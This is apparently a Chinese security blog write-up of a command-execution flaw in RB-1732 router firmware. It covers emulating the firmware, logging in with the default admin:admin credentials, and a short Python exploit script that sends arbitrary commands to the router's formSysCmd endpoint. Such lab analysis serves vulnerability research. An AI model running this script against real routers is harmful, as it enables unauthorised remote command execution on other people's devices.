在这里该固件的环境模拟主要通过firmware-analysis-toolkit工具实现,该工具集成了主流的几款自动化固件模拟工具。这里推荐大家下载attifyos3.0,其中已安装firmware-analysis-toolkit工具
attifyos3.0下载地址:https://pan.baidu.com/s/1-UQOBax1-t8EFVrzGvEhVQ提取码:zshs
本次漏洞分析所使用的固件版本为:RB-1732_TC_v2.0.43
固件下载地址:https://share.weiyun.com/5Z9kOYc
进入attifyos虚拟机中,切换目录至~/tools/firmware-analysis-toolkit
将RB-1732_TC_v2.0.43.bin放置到虚拟机中,在这里我的位置为/home/iot/Desktop/firewalk/RB-1732_TC_v2.0.43.bin
在命令行中执行 python3 fat.py /home/iot/Desktop/firewalk/RB-1732_TC_v2.0.43.bin
这里首先会进行网络的自动化配置,当显示br0的网络地址时,表示模拟器网络已配置好,记住此时的br0地址为192.168.1.1
此时回车,进行固件的部署,稍等片刻,显示如下图则表示环境已部署完成
访问http://192.168.1.1/admin.asp,此时显示路由器的管理页面,默认账号密码为admin:admin,表示环境已模拟完成
使用admin:admin默认账号登录后台,页面显示如下
接下来访问http://192.168.1.1/syscmd.asp,进入到命令执行页
输入ifconfig命令,成功执行
通过漏洞利用脚本执行结果如下
rb1732_exploit.py脚本内容如下
import requests
import sys
def test_httpcommand(ip, command):
my_data = {'sysCmd': command, 'apply': 'Apply', 'submit-url':'/syscmd.asp', 'msg':''}
r = requests.post('http://%s/goform/formSysCmd' % ip, data = my_data)
content = r.text
content = content[
content.find('<textarea rows="15" name="msg" cols="80" wrap="virtual">')+56:
content.rfind('</textarea>')]
return content
print test_httpcommand(sys.argv[1], " ".join(sys.argv[2:]))
原文始发于微信公众号(b1gpig信息安全):【路由器漏洞】Sapdio路由器命令执行分析
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论